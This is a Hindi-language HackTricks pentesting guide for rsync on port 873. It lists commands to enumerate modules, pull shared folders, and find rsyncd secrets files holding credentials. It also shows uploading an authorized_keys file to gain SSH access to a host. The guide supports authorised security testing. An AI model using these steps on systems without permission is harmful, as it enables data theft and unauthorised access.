hacktricks/network-services-pentesting/873-pentesting-rsync.md

873 - पेंटेस्टिंग आरसिंक

☁️ हैकट्रिक्स क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥

• क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को हैकट्रिक्स में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की आवश्यकता है? सदस्यता योजनाएं की जांच करें!

• खोजें The PEASS Family, हमारा विशेष संग्रह NFTs

• प्राप्त करें आधिकारिक PEASS और HackTricks swag

• शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या फॉलो करें मुझे ट्विटर पर 🐦@carlospolopm.

• अपने हैकिंग ट्रिक्स साझा करें, hacktricks रेपो और hacktricks-cloud रेपो को PR जमा करके।

मूलभूत जानकारी

rsync एक उपयोगी उपकरण है जो एक कंप्यूटर और एक बाहरी हार्ड ड्राइव के बीच और नेटवर्क के कंप्यूटरों के बीच फ़ाइलों को स्थानांतरित और समकालीन करने के लिए इस्तेमाल किया जाता है। यह फ़ाइलों के संशोधन समय और आकार की तुलना करके काम करता है।[3] यह आमतौर पर Unix-प्रकार ऑपरेटिंग सिस्टम पर मिलता है। rsync एल्गोरिदम एक प्रकार की डेल्टा कोडिंग है, और नेटवर्क उपयोग को कम करने के लिए इस्तेमाल किया जाता है। अतिरिक्त डेटा संपीड़न के लिए Zlib का उपयोग किया जा सकता है,[3] और सुरक्षा के लिए SSH या stunnel का उपयोग किया जा सकता है।

wikipedia से।

डिफ़ॉल्ट पोर्ट: 873

PORT    STATE SERVICE REASON
873/tcp open  rsync   syn-ack

जांच

बैनर और मैनुअल संचार

nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the sever to list
raidroot             <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Sever closes the connection


#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password

शेयर की गई फ़ोल्डरों की जाँच करें

एक rsync मॉड्यूल मूल रूप से एक डायरेक्टरी शेयर होता है। ये मॉड्यूल वैकल्पिक रूप से पासवर्ड द्वारा सुरक्षित किए जा सकते हैं। यह विकल्प उपलब्ध मॉड्यूलों की सूची बनाता है और वैकल्पिक रूप से यह निर्धारित करता है कि मॉड्यूल को एक्सेस करने के लिए पासवर्ड की आवश्यकता है या नहीं।

nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

#Example using IPv6 and a different port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730

ध्यान दें कि इसे कॉन्फ़िगर किया जा सकता है कि एक साझा नाम सूचीबद्ध न हो। इसलिए कुछ छिपा हुआ हो सकता है।
ध्यान दें कि कुछ साझा नामों की सूची हो सकती है जहां आपको पहुंच करने के लिए कुछ (अलग) क्रेडेंशियल्स की आवश्यकता होती है। इसलिए, हमेशा सभी सूचीबद्ध नामों को पहुंचने के लिए उपयुक्त नहीं होगा और आप इसे अनुभव करेंगे यदि आप कुछ ऐसा प्राप्त करते हैं जब आप उनमें से कुछ तक पहुंचने का प्रयास करते हैं तो आपको एक "पहुंच निषेध" संदेश प्राप्त होगा।

ब्रूट फोर्स

मैन्युअल Rsync

एक बार जब आपके पास मॉड्यूल की सूची हो तो आपके पास कुछ विभिन्न विकल्प होते हैं जो कार्रवाई आप लेना चाहते हैं और क्या प्रमाणीकरण की आवश्यकता होती है। यदि प्रमाणीकरण की आवश्यकता नहीं होती है तो आप एक साझा फ़ोल्डर की सूची बना सकते हैं:

rsync -av --list-only rsync://192.168.0.123/shared_name

और निम्नलिखित कमांड के माध्यम से अपनी स्थानीय मशीन पर सभी फ़ाइलें कॉपी करें:

rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared

यह सभी फ़ाइलें रिकर्सिव्ली ट्रांसफर करता है डिरेक्टरी <shared_name> मशीन <IP> पर स्थानीय मशीन पर ./rsync_shared निर्देशिका में। फ़ाइलें "आर्काइव" मोड में ट्रांसफर की जाती हैं, जिससे सुरंगी लिंक, उपकरण, गुण, अनुमतियाँ, स्वामित्व, आदि को ट्रांसफर में संरक्षित किया जाता है।

यदि आपके पास क्रेडेंशियल्स हैं तो आप निम्नलिखित का उपयोग करके एक साझा नाम को सूचीबद्ध/डाउनलोड कर सकते हैं (पासवर्ड पूछा जाएगा):

rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared

आप rsync का उपयोग करके कुछ सामग्री भी अपलोड कर सकते हैं (उदाहरण के लिए, इस मामले में हम एक authorized_keys फ़ाइल अपलोड कर सकते हैं ताकि हम बॉक्स में पहुँच प्राप्त कर सकें):

rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh

POST

rsyncd कॉन्फ़िगरेशन फ़ाइल ढूंढें:

find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)

कॉन्फ़िग फ़ाइल के अंदर कभी-कभी आप सीक्रेट्स फ़ाइल = /पथ/से/फ़ाइल पैरामीटर को खोज सकते हैं और इस फ़ाइल में rsyncd को प्रमाणित करने के लिए अनुमति दी गई उपयोगकर्ता नाम और पासवर्ड हो सकते हैं।

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति चाहिए? सदस्यता योजनाएं की जांच करें!

• खोजें The PEASS Family, हमारा विशेष NFT संग्रह

• प्राप्त करें आधिकारिक PEASS और HackTricks swag

• शामिल हों 💬 Discord समूह या टेलीग्राम समूह या मुझे ट्विटर पर फ़ॉलो करें 🐦@carlospolopm.

• अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके साझा करें.